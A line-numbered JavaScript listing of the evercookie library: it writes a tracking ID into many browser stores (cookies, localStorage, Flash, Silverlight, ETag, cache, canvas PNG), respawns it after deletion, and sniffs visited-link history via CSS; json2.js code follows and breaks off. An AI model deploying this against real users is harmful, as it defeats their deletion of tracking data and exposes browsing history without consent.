  162. self._evercookie(name, cb, undefined, undefined, dont_reset);
  163. });
  164. };
  165.  
  166. this.set = function(name, value)
  167. {
  168. $(document).ready(function() {
  169. self._evercookie(name, function() { }, value);
  170. });
  171. };
  172.  
  173. this._evercookie = function(name, cb, value, i, dont_reset)
  174. {
  175. if (typeof self._evercookie == 'undefined')
  176. self = this;
  177.  
  178. if (typeof i == 'undefined')
  179. i = 0;
  180.  
  181. // first run
  182. if (i == 0)
  183. {
  184. self.evercookie_database_storage(name, value);
  185. self.evercookie_png(name, value);
  186. self.evercookie_etag(name, value);
  187. self.evercookie_cache(name, value);
  188. self.evercookie_lso(name, value);
  189. self.evercookie_silverlight(name, value);
  190.  
  191. self._ec.userData = self.evercookie_userdata(name, value);
  192. self._ec.cookieData = self.evercookie_cookie(name, value);
  193. self._ec.localData = self.evercookie_local_storage(name, value);
  194. self._ec.globalData = self.evercookie_global_storage(name, value);
  195. self._ec.sessionData = self.evercookie_session_storage(name, value);
  196. self._ec.windowData = self.evercookie_window(name, value);
  197.  
  198. if (_ec_history)
  199. self._ec.historyData = self.evercookie_history(name, value);
  200. }
  201.  
  202. // when writing data, we need to make sure lso and silverlight object is there
  203. if (typeof value != 'undefined')
  204. {
  205. if (
  206. (
  207. (typeof _global_lso == 'undefined') ||
  208. (typeof _global_isolated == 'undefined')
  209. )
  210. && i++ < _ec_tests
  211. )
  212. setTimeout(function() { self._evercookie(name, cb, value, i, dont_reset) }, 300);
  213. }
  214.  
  215. // when reading data, we need to wait for swf, db, silverlight and png
  216. else
  217. {
  218. if (
  219. (
  220. // we support local db and haven't read data in yet
  221. (window.openDatabase && typeof self._ec.dbData == 'undefined') ||
  222. (typeof _global_lso == 'undefined') ||
  223. (typeof self._ec.etagData == 'undefined') ||
  224. (typeof self._ec.cacheData == 'undefined') ||
  225. (document.createElement('canvas').getContext && (typeof self._ec.pngData == 'undefined' || self._ec.pngData == '')) ||
  226. (typeof _global_isolated == 'undefined')
  227. )
  228. &&
  229. i++ < _ec_tests
  230. )
  231. {
  232. setTimeout(function() { self._evercookie(name, cb, value, i, dont_reset) }, 300);
  233. }
  234.  
  235. // we hit our max wait time or got all our data
  236. else
  237. {
  238. // get just the piece of data we need from swf
  239. self._ec.lsoData = self.getFromStr(name, _global_lso);
  240. _global_lso = undefined;
  241.  
  242. // get just the piece of data we need from silverlight
  243. self._ec.slData = self.getFromStr(name, _global_isolated);
  244. _global_isolated = undefined;
  245.  
  246. var tmpec = self._ec;
  247. self._ec = {};
  248.  
  249. // figure out which is the best candidate
  250. var candidates = new Array();
  251. var bestnum = 0;
  252. var candidate;
  253. for (var item in tmpec)
  254. {
  255. if (typeof tmpec[item] != 'undefined' && typeof tmpec[item] != 'null' && tmpec[item] != '' &&
  256. tmpec[item] != 'null' && tmpec[item] != 'undefined' && tmpec[item] != null)
  257. {
  258. candidates[tmpec[item]] = typeof candidates[tmpec[item]] == 'undefined' ? 1 : candidates[tmpec[item]] + 1;
  259. }
  260. }
  261.  
  262. for (var item in candidates)
  263. {
  264. if (candidates[item] > bestnum)
  265. {
  266. bestnum = candidates[item];
  267. candidate = item;
  268. }
  269. }
  270.  
  271. // reset cookie everywhere
  272. if (typeof dont_reset == "undefined" || dont_reset != 1)
  273. self.set(name, candidate);
  274.  
  275. if (typeof cb == 'function')
  276. cb(candidate, tmpec);
  277. }
  278. }
  279. };
  280.  
  281. this.evercookie_window = function(name, value)
  282. {
  283. try {
  284. if (typeof(value) != "undefined")
  285. window.name = _ec_replace(window.name, name, value);
  286. else
  287. return this.getFromStr(name, window.name);
  288. } catch(e) { }
  289. };
  290.  
  291. this.evercookie_userdata = function(name, value)
  292. {
  293. try {
  294. var elm = this.createElem('div', 'userdata_el', 1);
  295. elm.style.behavior = "url(#default#userData)";
  296.  
  297. if (typeof(value) != "undefined")
  298. {
  299. elm.setAttribute(name, value);
  300. elm.save(name);
  301. }
  302. else
  303. {
  304. elm.load(name);
  305. return elm.getAttribute(name);
  306. }
  307. } catch(e) { }
  308. };
  309.  
  310. this.evercookie_cache = function(name, value)
  311. {
  312. if (typeof(value) != "undefined")
  313. {
  314. // make sure we have evercookie session defined first
  315. document.cookie = 'evercookie_cache=' + value;
  316.  
  317. // evercookie_cache.php handles caching
  318. var img = new Image();
  319. img.style.visibility = 'hidden';
  320. img.style.position = 'absolute';
  321. img.src = 'evercookie_cache.php?name=' + name;
  322. }
  323. else
  324. {
  325. // interestingly enough, we want to erase our evercookie
  326. // http cookie so the php will force a cached response
  327. var origvalue = this.getFromStr('evercookie_cache', document.cookie);
  328. self._ec.cacheData = undefined;
  329. document.cookie = 'evercookie_cache=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
  330.  
  331. $.ajax({
  332. url: 'evercookie_cache.php?name=' + name,
  333. success: function(data) {
  334. // put our cookie back
  335. document.cookie = 'evercookie_cache=' + origvalue + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
  336.  
  337. self._ec.cacheData = data;
  338. }
  339. });
  340. }
  341. };
  342.  
  343. this.evercookie_etag = function(name, value)
  344. {
  345. if (typeof(value) != "undefined")
  346. {
  347. // make sure we have evercookie session defined first
  348. document.cookie = 'evercookie_etag=' + value;
  349.  
  350. // evercookie_etag.php handles etagging
  351. var img = new Image();
  352. img.style.visibility = 'hidden';
  353. img.style.position = 'absolute';
  354. img.src = 'evercookie_etag.php?name=' + name;
  355. }
  356. else
  357. {
  358. // interestingly enough, we want to erase our evercookie
  359. // http cookie so the php will force a cached response
  360. var origvalue = this.getFromStr('evercookie_etag', document.cookie);
  361. self._ec.etagData = undefined;
  362. document.cookie = 'evercookie_etag=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
  363.  
  364. $.ajax({
  365. url: 'evercookie_etag.php?name=' + name,
  366. success: function(data) {
  367. // put our cookie back
  368. document.cookie = 'evercookie_etag=' + origvalue + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
  369.  
  370. self._ec.etagData = data;
  371. }
  372. });
  373. }
  374. };
  375.  
  376. this.evercookie_lso = function(name, value)
  377. {
  378. var div = document.getElementById('swfcontainer');
  379. if (!div)
  380. {
  381. div = document.createElement("div");
  382. div.setAttribute('id', 'swfcontainer');
  383. document.body.appendChild(div);
  384. }
  385.  
  386. var flashvars = {};
  387. if (typeof value != 'undefined')
  388. flashvars.everdata = name + '=' + value;
  389.  
  390. var params = {};
  391. params.swliveconnect = "true";
  392. var attributes = {};
  393. attributes.id = "myswf";
  394. attributes.name = "myswf";
  395. swfobject.embedSWF("evercookie.swf", "swfcontainer", "1", "1", "9.0.0", false, flashvars, params, attributes);
  396. };
  397.  
  398. this.evercookie_png = function(name, value)
  399. {
  400. if (document.createElement('canvas').getContext)
  401. {
  402. if (typeof(value) != "undefined")
  403. {
  404. // make sure we have evercookie session defined first
  405. document.cookie = 'evercookie_png=' + value;
  406.  
  407. // evercookie_png.php handles the hard part of generating the image
  408. // based off of the http cookie and returning it cached
  409. var img = new Image();
  410. img.style.visibility = 'hidden';
  411. img.style.position = 'absolute';
  412. img.src = 'evercookie_png.php?name=' + name;
  413. }
  414. else
  415. {
  416. self._ec.pngData = undefined;
  417. var context = document.createElement('canvas');
  418. context.style.visibility = 'hidden';
  419. context.style.position = 'absolute';
  420. context.width = 200;
  421. context.height = 1;
  422. var ctx = context.getContext('2d');
  423.  
  424. // interestingly enough, we want to erase our evercookie
  425. // http cookie so the php will force a cached response
  426. var origvalue = this.getFromStr('evercookie_png', document.cookie);
  427. document.cookie = 'evercookie_png=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
  428.  
  429. var img = new Image();
  430. img.style.visibility = 'hidden';
  431. img.style.position = 'absolute';
  432. img.src = 'evercookie_png.php?name=' + name;
  433.  
  434. img.onload = function()
  435. {
  436. // put our cookie back
  437. document.cookie = 'evercookie_png=' + origvalue + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
  438.  
  439. self._ec.pngData = '';
  440. ctx.drawImage(img,0,0);
  441.  
  442. // get CanvasPixelArray from given coordinates and dimensions
  443. var imgd = ctx.getImageData(0, 0, 200, 1);
  444. var pix = imgd.data;
  445.  
  446. // loop over each pixel to get the "RGB" values (ignore alpha)
  447. for (var i = 0, n = pix.length; i < n; i += 4)
  448. {
  449. if (pix[i ] == 0) break;
  450. self._ec.pngData += String.fromCharCode(pix[i]);
  451. if (pix[i+1] == 0) break;
  452. self._ec.pngData += String.fromCharCode(pix[i+1]);
  453. if (pix[i+2] == 0) break;
  454. self._ec.pngData += String.fromCharCode(pix[i+2]);
  455. }
  456. }
  457. }
  458. }
  459. };
  460.  
  461. this.evercookie_local_storage = function(name, value)
  462. {
  463. try
  464. {
  465. if (window.localStorage)
  466. {
  467. if (typeof(value) != "undefined")
  468. localStorage.setItem(name, value);
  469. else
  470. return localStorage.getItem(name);
  471. }
  472. }
  473. catch (e) { }
  474. };
  475.  
  476. this.evercookie_database_storage = function(name, value)
  477. {
  478. try
  479. {
  480. if (window.openDatabase)
  481. {
  482. var database = window.openDatabase("sqlite_evercookie", "", "evercookie", 1024 * 1024);
  483.  
  484. if (typeof(value) != "undefined")
  485. database.transaction(function(tx)
  486. {
  487. tx.executeSql("CREATE TABLE IF NOT EXISTS cache(" +
  488. "id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT, " +
  489. "name TEXT NOT NULL, " +
  490. "value TEXT NOT NULL, " +
  491. "UNIQUE (name)" +
  492. ")", [], function (tx, rs) { }, function (tx, err) { });
  493.  
  494. tx.executeSql("INSERT OR REPLACE INTO cache(name, value) VALUES(?, ?)", [name, value],
  495. function (tx, rs) { }, function (tx, err) { })
  496. });
  497. else
  498. {
  499. database.transaction(function(tx)
  500. {
  501. tx.executeSql("SELECT value FROM cache WHERE name=?", [name],
  502. function(tx, result1) {
  503. if (result1.rows.length >= 1)
  504. self._ec.dbData = result1.rows.item(0)['value'];
  505. else
  506. self._ec.dbData = '';
  507. }, function (tx, err) { })
  508. });
  509. }
  510. }
  511. } catch(e) { }
  512. };
  513.  
  514. this.evercookie_session_storage = function(name, value)
  515. {
  516. try
  517. {
  518. if (window.sessionStorage)
  519. {
  520. if (typeof(value) != "undefined")
  521. sessionStorage.setItem(name, value);
  522. else
  523. return sessionStorage.getItem(name);
  524. }
  525. } catch(e) { }
  526. };
  527.  
  528. this.evercookie_global_storage = function(name, value)
  529. {
  530. if (window.globalStorage)
  531. {
  532. var host = this.getHost();
  533.  
  534. try
  535. {
  536. if (typeof(value) != "undefined")
  537. eval("globalStorage[host]." + name + " = value");
  538. else
  539. return eval("globalStorage[host]." + name);
  540. } catch(e) { }
  541. }
  542. };
  543. this.evercookie_silverlight = function(name, value) {
  544. /*
  545. * Create silverlight embed
  546. *
  547. * Ok. so, I tried doing this the proper dom way, but IE chokes on appending anything in object tags (including params), so this
  548. * is the best method I found. Someone really needs to find a less hack-ish way. I hate the look of this shit.
  549. */
  550. var source = "evercookie.xap";
  551. var minver = "4.0.50401.0";
  552.  
  553. var initParam = "";
  554. if(typeof(value) != "undefined")
  555. initParam = '<param name="initParams" value="'+name+'='+value+'" />';
  556.  
  557. var html =
  558. '<object data="data:application/x-silverlight-2," type="application/x-silverlight-2" id="mysilverlight" width="0" height="0">' +
  559. initParam +
  560. '<param name="source" value="'+source+'"/>' +
  561. '<param name="onLoad" value="onSilverlightLoad"/>' +
  562. '<param name="onError" value="onSilverlightError"/>' +
  563. '<param name="background" value="Transparent"/>' +
  564. '<param name="windowless" value="true"/>' +
  565. '<param name="minRuntimeVersion" value="'+minver+'"/>' +
  566. '<param name="autoUpgrade" value="true"/>' +
  567. '<a href="http://go.microsoft.com/fwlink/?LinkID=149156&v='+minver+'" style="text-decoration:none">' +
  568. '<img src="http://go.microsoft.com/fwlink/?LinkId=108181" alt="Get Microsoft Silverlight" style="border-style:none"/>' +
  569. '</a>' +
  570. '</object>';
  571. document.body.innerHTML+=html;
  572. };
  573.  
  574. // public method for encoding
  575. this.encode = function (input) {
  576. var output = "";
  577. var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
  578. var i = 0;
  579.  
  580. input = this._utf8_encode(input);
  581.  
  582. while (i < input.length) {
  583.  
  584. chr1 = input.charCodeAt(i++);
  585. chr2 = input.charCodeAt(i++);
  586. chr3 = input.charCodeAt(i++);
  587.  
  588. enc1 = chr1 >> 2;
  589. enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
  590. enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
  591. enc4 = chr3 & 63;
  592.  
  593. if (isNaN(chr2)) {
  594. enc3 = enc4 = 64;
  595. } else if (isNaN(chr3)) {
  596. enc4 = 64;
  597. }
  598.  
  599. output = output +
  600. _baseKeyStr.charAt(enc1) + _baseKeyStr.charAt(enc2) +
  601. _baseKeyStr.charAt(enc3) + _baseKeyStr.charAt(enc4);
  602.  
  603. }
  604.  
  605. return output;
  606. };
  607.  
  608. // public method for decoding
  609. this.decode = function (input) {
  610. var output = "";
  611. var chr1, chr2, chr3;
  612. var enc1, enc2, enc3, enc4;
  613. var i = 0;
  614.  
  615. input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
  616.  
  617. while (i < input.length) {
  618. enc1 = _baseKeyStr.indexOf(input.charAt(i++));
  619. enc2 = _baseKeyStr.indexOf(input.charAt(i++));
  620. enc3 = _baseKeyStr.indexOf(input.charAt(i++));
  621. enc4 = _baseKeyStr.indexOf(input.charAt(i++));
  622.  
  623. chr1 = (enc1 << 2) | (enc2 >> 4);
  624. chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
  625. chr3 = ((enc3 & 3) << 6) | enc4;
  626.  
  627. output = output + String.fromCharCode(chr1);
  628.  
  629. if (enc3 != 64) {
  630. output = output + String.fromCharCode(chr2);
  631. }
  632. if (enc4 != 64) {
  633. output = output + String.fromCharCode(chr3);
  634. }
  635.  
  636. }
  637.  
  638. output = this._utf8_decode(output);
  639.  
  640. return output;
  641.  
  642. };
  643.  
  644. // private method for UTF-8 encoding
  645. this._utf8_encode = function (string) {
  646. string = string.replace(/\r\n/g,"\n");
  647. var utftext = "";
  648.  
  649. for (var n = 0; n < string.length; n++) {
  650.  
  651. var c = string.charCodeAt(n);
  652.  
  653. if (c < 128) {
  654. utftext += String.fromCharCode(c);
  655. }
  656. else if((c > 127) && (c < 2048)) {
  657. utftext += String.fromCharCode((c >> 6) | 192);
  658. utftext += String.fromCharCode((c & 63) | 128);
  659. }
  660. else {
  661. utftext += String.fromCharCode((c >> 12) | 224);
  662. utftext += String.fromCharCode(((c >> 6) & 63) | 128);
  663. utftext += String.fromCharCode((c & 63) | 128);
  664. }
  665.  
  666. }
  667.  
  668. return utftext;
  669. };
  670.  
  671. // private method for UTF-8 decoding
  672. this._utf8_decode = function (utftext) {
  673. var string = "";
  674. var i = 0;
  675. var c = c1 = c2 = 0;
  676.  
  677. while ( i < utftext.length ) {
  678.  
  679. c = utftext.charCodeAt(i);
  680.  
  681. if (c < 128) {
  682. string += String.fromCharCode(c);
  683. i++;
  684. }
  685. else if((c > 191) && (c < 224)) {
  686. c2 = utftext.charCodeAt(i+1);
  687. string += String.fromCharCode(((c & 31) << 6) | (c2 & 63));
  688. i += 2;
  689. }
  690. else {
  691. c2 = utftext.charCodeAt(i+1);
  692. c3 = utftext.charCodeAt(i+2);
  693. string += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
  694. i += 3;
  695. }
  696.  
  697. }
  698.  
  699. return string;
  700. };
  701.  
  702. // this is crazy but it's 4am in dublin and i thought this would be hilarious
  703. // blame the guinness
  704. this.evercookie_history = function(name, value)
  705. {
  706. // - is special
  707. var baseStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=-";
  708. var baseElems = baseStr.split("");
  709.  
  710. // sorry google.
  711. var url = 'http://www.google.com/evercookie/cache/' + this.getHost() + '/' + name;
  712.  
  713. if (typeof(value) != "undefined")
  714. {
  715. // don't reset this if we already have it set once
  716. // too much data and you can't clear previous values
  717. if (this.hasVisited(url))
  718. return;
  719.  
  720. this.createIframe(url, 'if');
  721. url = url + '/';
  722.  
  723. var base = this.encode(value).split("");
  724. for (var i = 0; i < base.length; i++)
  725. {
  726. url = url + base[i];
  727. this.createIframe(url, 'if' + i);
  728. }
  729.  
  730. // - signifies the end of our data
  731. url = url + '-';
  732. this.createIframe(url, 'if_');
  733. }
  734. else
  735. {
  736. // omg you got csspwn3d
  737. if (this.hasVisited(url))
  738. {
  739. url = url + '/';
  740.  
  741. var letter = "";
  742. var val = "";
  743. var found = 1;
  744. while (letter != '-' && found == 1)
  745. {
  746. found = 0;
  747. for (var i = 0; i < baseElems.length; i++)
  748. {
  749. if (this.hasVisited(url + baseElems[i]))
  750. {
  751. letter = baseElems[i];
  752. if (letter != '-')
  753. val = val + letter;
  754. url = url + letter;
  755. found = 1;
  756. break;
  757. }
  758. }
  759. }
  760.  
  761. // lolz
  762. return this.decode(val);
  763. }
  764. }
  765. };
  766.  
  767. this.createElem = function(type, name, append)
  768. {
  769. var el;
  770. if (typeof name != 'undefined' && document.getElementById(name))
  771. el = document.getElementById(name);
  772. else
  773. el = document.createElement(type);
  774. el.style.visibility = 'hidden';
  775. el.style.position = 'absolute';
  776.  
  777. if (name)
  778. el.setAttribute('id', name);
  779.  
  780. if (append)
  781. document.body.appendChild(el);
  782.  
  783. return el;
  784. };
  785.  
  786. this.createIframe = function(url, name)
  787. {
  788. var el = this.createElem('iframe', name, 1);
  789. el.setAttribute('src', url);
  790. return el;
  791. };
  792.  
  793. // wait for our swfobject to appear (swfobject.js to load)
  794. this.waitForSwf = function(i)
  795. {
  796. if (typeof i == 'undefined')
  797. i = 0;
  798. else
  799. i++;
  800.  
  801. // wait for ~2 seconds for swfobject to appear
  802. if (i < _ec_tests && typeof swfobject == 'undefined')
  803. setTimeout(function() { waitForSwf(i) }, 300);
  804. };
  805.  
  806. this.evercookie_cookie = function(name, value)
  807. {
  808. try{
  809. if (typeof(value) != "undefined")
  810. {
  811. // expire the cookie first
  812. document.cookie = name + '=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
  813. document.cookie = name + '=' + value + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
  814. }
  815. else
  816. return this.getFromStr(name, document.cookie);
  817. }catch(e){
  818. // the hooked domain is using HttpOnly, so we must set the hook ID in a different way.
  819. // evercookie_userdata and evercookie_window will be used in this case.
  820. }
  821. };
  822.  
  823. // get value from param-like string (eg, "x=y&name=VALUE")
  824. this.getFromStr = function(name, text)
  825. {
  826. if (typeof text != 'string')
  827. return;
  828.  
  829. var nameEQ = name + "=";
  830. var ca = text.split(/[;&]/);
  831. for (var i = 0; i < ca.length; i++)
  832. {
  833. var c = ca[i];
  834. while (c.charAt(0) == ' ')
  835. c = c.substring(1, c.length);
  836. if (c.indexOf(nameEQ) == 0)
  837. return c.substring(nameEQ.length, c.length);
  838. }
  839. };
  840.  
  841. this.getHost = function()
  842. {
  843. var domain = document.location.host;
  844. if (domain.indexOf('www.') == 0)
  845. domain = domain.replace('www.', '');
  846. return domain;
  847. };
  848.  
  849. this.toHex = function(str)
  850. {
  851. var r = "";
  852. var e = str.length;
  853. var c = 0;
  854. var h;
  855. while (c < e)
  856. {
  857. h = str.charCodeAt(c++).toString(16);
  858. while (h.length < 2)
  859. h = "0" + h;
  860. r += h;
  861. }
  862. return r;
  863. };
  864.  
  865. this.fromHex = function(str)
  866. {
  867. var r = "";
  868. var e = str.length;
  869. var s;
  870. while (e >= 0)
  871. {
  872. s = e - 2;
  873. r = String.fromCharCode("0x" + str.substring(s, e)) + r;
  874. e = s;
  875. }
  876. return r;
  877. };
  878.  
  879. /*
  880. * css history knocker (determine what sites your visitors have been to)
  881. *
  882. * originally by Jeremiah Grossman
  883. * http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html
  884. *
  885. * ported to additional browsers by Samy Kamkar
  886. *
  887. * compatible with ie6, ie7, ie8, ff1.5, ff2, ff3, opera, safari, chrome, flock
  888. *
  889. * - code@samy.pl
  890. */
  891.  
  892.  
  893. this.hasVisited = function(url)
  894. {
  895. if (this.no_color == -1)
  896. {
  897. var no_style = this._getRGB("http://samy-was-here-this-should-never-be-visited.com", -1);
  898. if (no_style == -1)
  899. this.no_color =
  900. this._getRGB("http://samy-was-here-"+Math.floor(Math.random()*9999999)+"rand.com");
  901. }
  902.  
  903. // did we give full url?
  904. if (url.indexOf('https:') == 0 || url.indexOf('http:') == 0)
  905. return this._testURL(url, this.no_color);
  906.  
  907. // if not, just test a few diff types if (exact)
  908. return this._testURL("http://" + url, this.no_color) ||
  909. this._testURL("https://" + url, this.no_color) ||
  910. this._testURL("http://www." + url, this.no_color) ||
  911. this._testURL("https://www." + url, this.no_color);
  912. };
  913.  
  914. /* create our anchor tag */
  915. var _link = this.createElem('a', '_ec_rgb_link');
  916.  
  917. /* for monitoring */
  918. var created_style;
  919.  
  920. /* create a custom style tag for the specific link. Set the CSS visited selector to a known value */
  921. var _cssText = '#_ec_rgb_link:visited{display:none;color:#FF0000}';
  922.  
  923. /* Methods for IE6, IE7, FF, Opera, and Safari */
  924. try {
  925. created_style = 1;
  926. var style = document.createElement('style');
  927. if (style.styleSheet)
  928. style.styleSheet.innerHTML = _cssText;
  929. else if (style.innerHTML)
  930. style.innerHTML = _cssText;
  931. else
  932. {
  933. var cssT = document.createTextNode(_cssText);
  934. style.appendChild(cssT);
  935. }
  936. } catch (e) {
  937. created_style = 0;
  938. }
  939.  
  940. /* if test_color, return -1 if we can't set a style */
  941. this._getRGB = function (u, test_color) {
  942. if (test_color && created_style == 0)
  943. return -1;
  944.  
  945. /* create the new anchor tag with the appropriate URL information */
  946. _link.href = u;
  947. _link.innerHTML = u;
  948. // not sure why, but the next two appendChilds always have to happen vs just once
  949. document.body.appendChild(style);
  950. document.body.appendChild(_link);
  951.  
  952. /* add the link to the DOM and save the visible computed color */
  953. var color;
  954. if (document.defaultView)
  955. color = document.defaultView.getComputedStyle(_link, null).getPropertyValue('color');
  956. else
  957. color = _link.currentStyle['color'];
  958.  
  959. return color;
  960. };
  961.  
  962. this._testURL = function(url, no_color){
  963. var color = this._getRGB(url);
  964.  
  965. /* check to see if the link has been visited if the computed color is red */
  966. if (color == "rgb(255, 0, 0)" || color == "#ff0000")
  967. return 1;
  968.  
  969. /* if our style trick didn't work, just compare default style colors */
  970. else if (no_color && color != no_color)
  971. return 1;
  972.  
  973. /* not found */
  974. return 0;
  975. }
  976.  
  977. };
  978.  
  979. return _class;
  980. })();
  981.  
  982.  
  983. /*
  984. * Again, ugly workaround....same problem as flash.
  985. */
  986. var _global_isolated;
  987. function onSilverlightLoad(sender, args) {
  988. var control = sender.getHost();
  989. _global_isolated = control.Content.App.getIsolatedStorage();
  990. }
  991. /*
  992. function onSilverlightError(sender, args) {
  993. _global_isolated = "";
  994.  
  995. }*/
  996. function onSilverlightError(sender, args) {
  997. _global_isolated = "";
  998. }
  999.  
  1000.  
  1001. /*
  1002. https://github.com/douglascrockford/JSON-js/blob/master/json2.js
  1003. 2011-02-23
  1004.  
  1005. // Create a JSON object only if one does not already exist. We create the
  1006. // methods in a closure to avoid creating global variables.
  1007. */
  1008.  
  1009. var JSON;
  1010. if (!JSON) {
  1011. JSON = {};
  1012. }
  1013.  
  1014. (function () {
  1015. "use strict";
  1016.  
  1017. function f(n) {
  1018. // Format integers to have at least two digits.
  1019. return n < 10 ? '0' + n : n;
  1020. }
  1021.  
  1022. if (typeof Date.prototype.toJSON !== 'function') {
  1023.  
  1024. Date.prototype.toJSON = function (key) {
  1025.  
  1026. return isFinite(this.valueOf()) ?
  1027. this.getUTCFullYear() + '-' +
  1028. f(this.getUTCMonth() + 1) + '-' +
  1029. f(this.getUTCDate()) + 'T' +
  1030. f(this.getUTCHours()) + ':' +
  1031. f(this.getUTCMinutes()) + ':' +
  1032. f(this.getUTCSeconds()) + 'Z' : null;
  1033. };
  1034.  
  1035. String.prototype.toJSON =
  1036. Number.prototype.toJSON =
  1037. Boolean.prototype.toJSON = function (key) {
  1038. return this.valueOf();
  1039. };
  1040. }
  1041.  
  1042. var cx = /[\u0000\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,
  1043. escapable = /[\\\"\x00-\x1f\x7f-\x9f\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,
  1044. gap,
  1045. indent,
  1046. meta = { // table of character substitutions
  1047. '\b': '\\b',
  1048. '\t': '\\t',
  1049. '\n': '\\n',
  1050. '\f': '\\f',
  1051. '\r': '\\r',
  1052. '"' : '\\"',
  1053. '\\': '\\\\'
  1054. },
  1055. rep;
  1056.  
  1057.  
  1058. function quote(string) {
  1059.  
  1060. // If the string contains no control characters, no quote characters, and no
  1061. // backslash characters, then we can safely slap some quotes around it.
  1062. // Otherwise we must also replace the offending characters with safe escape
  1063. // sequences.
  1064.  
  1065. escapable.lastIndex = 0;
  1066. return escapable.test(string) ? '"' + string.replace(escapable, function (a) {
  1067. var c = meta[a];
  1068. return typeof c === 'string' ? c :
  1069. '\\u' + ('0000' + a.charCodeAt(0).toString(16)).slice(-4);
  1070. }) + '"' : '"' + string + '"';
  1071. }
  1072.  
  1073.  
  1074. function str(key, holder) {
  1075.  
  1076. // Produce a string from holder[key].
  1077.  
  1078. var i, // The loop counter.
  1079. k, // The member key.
  1080. v, // The member value.
  1081. length,
  1082. mind = gap,
  1083. partial,
  1084. value = holder[key];
  1085.  
  1086. // If the value has a toJSON method, call it to obtain a replacement value.
  1087.  
  1088. if (value && typeof value === 'object' &&
  1089. typeof value.toJSON === 'function') {
  1090. value = value.toJSON(key);
  1091. }
  1092.  
  1093. // If we were called with a replacer function, then call the replacer to
  1094. // obtain a replacement value.
  1095.  
  1096. if (typeof rep === 'function') {
  1097. value = rep.call(holder, key, value);
  1098. }
  1099.  
  1100. // What happens next depends on the value's type.
  1101.  
  1102. switch (typeof value) {
  1103. case 'string':
  1104. return quote(value);
  1105.  
  1106. case 'number':
  1107.  
  1108. // JSON numbers must be finite. Encode non-finite numbers as null.
  1109.  
  1110. return isFinite(value) ? String(value) : 'null';
  1111.  
  1112. case 'boolean':
  1113. case 'null':
  1114.  
  1115. // If the value is a boolean or null, convert it to a string. Note:
  1116. // typeof null does not produce 'null'. The case is included here in
  1117. // the remote chance that this gets fixed someday.
  1118.  
  1119. return String(value);
  1120.  
  1121. // If the type is 'object', we might be dealing with an object or an array or
  1122. // null.
  1123.  
  1124. case 'object':
  1125.  
  1126. // Due to a specification blunder in ECMAScript, typeof null is 'object',
  1127. // so watch out for that case.
  1128.  
  1129. if (!value) {
  1130. return 'null';
  1131. }
  1132.  
  1133. // Make an array to hold the partial results of stringifying this object value.
  1134.  
  1135. gap += indent;
  1136. partial = [];
  1137.  
  1138. // Is the value an array?
  1139.  
  1140. if (Object.prototype.toString.apply(value) === '[object Array]') {
  1141.  
  1142. // The value is an array. Stringify every element. Use null as a placeholder
  1143. // for non-JSON values.
  1144.  
  1145. length = value.length;
  1146. for (i = 0; i < length; i += 1) {
  1147. partial[i] = str(i, value) || 'null';
  1148. }
  1149.  
  1150. // Join all of the elements together, separated with commas, and wrap them in
  1151. // brackets.
  1152.  
  1153. v = partial.length === 0 ? '[]' : gap ?
  1154. '[\n' + gap + partial.join(',\n' + gap) + '\n' + mind + ']' :
  1155. '[' + partial.join(',') + ']';
  1156. gap = mind;
  1157. return v;
  1158. }
  1159.  
  1160. // If the replacer is an array, use it to select the members to be stringified.
  1161.  
  1162. if (rep && typeof rep === 'object') {
  1163. length = rep.length;
  1164. for (i = 0; i < length; i += 1) {
  1165. if (typeof rep[i] === 'string') {
  1166. k = rep[i];
  1167. v = str(k, value);
  1168. if (v) {
  1169. partial.push(quote(k) + (gap ? ': ' : ':') + v);
  1170. }
  1171. }
  1172. }
  1173. } else {
  1174.  
  1175. // Otherwise, iterate through all of the keys in the object.
  1176.  
  1177. for (k in value) {
  1178. if (Object.prototype.hasOwnProperty.call(value, k)) {
  1179. v = str(k, value);
  1180. if (v) {
  1181. partial.push(quote(k) + (gap ? ': ' : ':') + v);
  1182. }
  1183. }
  1184. }
  1185. }
  1186.  
  1187. // Join all of the member texts together, separated with commas,
  1188. // and wrap them in braces.
  1189.  
  1190. v = partial.length === 0 ? '{}' : gap ?
  1191. '{\n' + gap + partial.join(',\n' + gap) + '\n' + mind + '}' :
  1192. '{' + partial.join(',') + '}';
  1193. gap = mind;
  1194. return v;
  1195. }
  1196. }
  1197.  
  1198. // If the JSON object does not yet have a stringify method, give it one.
  1199.  
  1200. if (typeof JSON.stringify !== 'function') {
  1201. JSON.stringify = function (value, replacer, space) {
  1202.  
  1203. // The stringify method takes a value and an optional replacer, and an optional
  1204. // space parameter, and returns a JSON text. The replacer can be a function
  1205. // that can replace values, or an array of strings that will select the keys.
  1206. // A default replacer method can be provided. Use of the space parameter can
  1207. // produce text that is more easily readable.
  1208.  
  1209. var i;
  1210. gap = '';
  1211. indent = '';
  1212.  
  1213. // If the space parameter is a number, make an indent string containing that
  1214. // many spaces.
  1215.  
  1216. if (typeof space === 'number') {
  1217. for (i = 0; i < space; i += 1) {
  1218. indent += ' ';
  1219. }
  1220.  
  1221. // If the space parameter is a string, it will be used as the indent string.
  1222.  
  1223. } else if (typeof space === 'string') {
  1224. indent = space;
  1225. }
  1226.  
  1227. // If there is a replacer, it must be a function or an array.
  1228. // Otherwise, throw an error.
  1229.  
  1230. rep = replacer;
